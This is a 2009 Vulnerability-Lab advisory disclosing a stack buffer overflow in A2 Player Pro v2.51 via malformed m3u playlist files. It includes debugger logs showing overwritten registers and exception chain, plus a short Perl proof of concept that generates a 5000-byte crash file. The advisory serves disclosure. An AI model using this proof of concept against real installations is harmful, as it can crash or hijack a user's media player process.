Document Title:
===============
A2 Player Pro v2.51 - Stack Overflow Vulnerability (m3u)



Release Date:
=============
2009-07-14


Vulnerability Laboratory ID (VL-ID):
====================================
2


Product & Service Introduction:
===============================
Audio Player

    


Abstract Advisory Information:
==============================
The Vulnerability-Lab Research Team discovered a Stack Overflow Vulnerability on the A2 Media Player.


Vulnerability Disclosure Timeline:
==================================
2009-07-13: Discovery by Vulnerability-Lab


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Local


Severity Level:
===============
High


Technical Details & Description:
================================
Due a lack of the wrong validation check while loading a m3u/m3l file a stack overflow can crash the program.
The successful exploitation allows an remote attacker to overwrite for example the eip to control the vulnerable software process.


--- Debug Logs ---
(f08.dc4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=41414141 ecx=00000000 edx=01e088d8 esi=0012e9a8 edi=01e088d8
eip=00403e98 esp=0012e978 ebp=0012f9ac iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
*** WARNING: Unable to verify checksum for image00400000
*** ERROR: Module load completed but symbols could not be loaded for image00400000
image00400000+0x3e98:
00403e98 8b10            mov     edx,dword ptr [eax]  ds:0023:41414141=????????
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:000> !exchain
0012e98c: image00400000+2eefa (0042eefa)
0012f9b4: <Unloaded_ows-1252.so>+41414140 (41414141)
Invalid exception stack at 41414141

0:000> d ebp
0012f9ac  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f9bc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f9cc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f9dc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f9ec  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012f9fc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fa0c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012fa1c  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0:000> d esi
0012e9a8  31 20 20 20 20 41 41 41-41 41 41 41 41 41 41 41  1    AAAAAAAAAAA
0012e9b8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012e9c8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012e9d8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012e9e8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012e9f8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012ea08  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
0012ea18  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA


CallStack:
# ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0012f9ac 41414141 41414141 41414141 41414141 image00400000+0x3e98
01 0012f9b0 41414141 41414141 41414141 41414141 <Unloaded_ows-1252.so>+0x41414140
02 0012f9b4 41414141 41414141 41414141 41414141


Proof of Concept (PoC):
=======================
This vulnerability can be exploited over the remote & local way. The local method needs a manipulated m3u file.
The remote way needs a manipualted remote stream as file. To reproduce the bug use this perl script to generate the m3u file.

my $sploitfile="x4lt.m3u";
print " [+] Preparing payload\n";
my $junk = "A" x 5000;
my $payload = $junk;
print " [+] Writing payload to file\n";
open(sploitf,">$sploitfile");
print sploitf $payload;
close(sploitf);
print " [+] PoC file " . sploitfile . " created\n";
print " [+] Wrote " . length($payload) . " bytes\n";


Security Risk:
==============
The security risk of the stack buffer overflow vulnerability is estimated as high.


Credits & Authors:
==================
Vulnerability Research Laboratory - Pim J.F. Campers


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory